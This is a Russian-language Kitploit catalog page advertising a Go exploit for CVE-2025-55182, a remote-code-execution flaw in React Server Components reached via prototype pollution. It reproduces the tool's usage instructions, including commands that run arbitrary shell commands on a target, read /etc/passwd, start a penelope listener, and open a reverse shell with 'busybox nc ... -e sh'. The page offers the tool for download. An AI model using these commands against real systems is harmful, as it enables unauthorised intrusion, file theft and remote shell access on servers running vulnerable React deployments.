Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-in-go — Эксплоит на Go для CVE-2025-55182, обеспечивающий удаленное выполнение кода в React Server Components через загрязнение прототипа. Поддерживает выполнение произвольных команд и полезные нагрузки reverse shell. | Kitploit
Инструменты/GitHubGitHub/w3nch/cve-2025-55182-in-go
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubw3nch/cve-2025-55182-in-go

CVE-2025-55182-in-go

Эксплоит на Go для CVE-2025-55182, обеспечивающий удаленное выполнение кода в React Server Components через загрязнение прототипа. Поддерживает выполнение произвольных команд и полезные нагрузки reverse shell.

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 — Удаленное выполнение кода в React Server Components

Эксплойт для удаленного выполнения кода в React Server Components через загрязнение прототипа.

Использование

root@kitploit:~
go run main.go -t <target> -c <command>

Примеры

root@kitploit:~
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"

Обратный шелл

Настройка обратного шелла

root@kitploit:~
penelope -i 0.0.0.0 -p 1337

Используйте busybox:

root@kitploit:~
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"

Сборка

root@kitploit:~
go build -o exploit .

Примечания

  • HTTPS добавляется автоматически, если схема отсутствует
  • Вывод команды кодируется в base64 в ответе
  • Перенаправления намеренно отключены
Скачать инструмент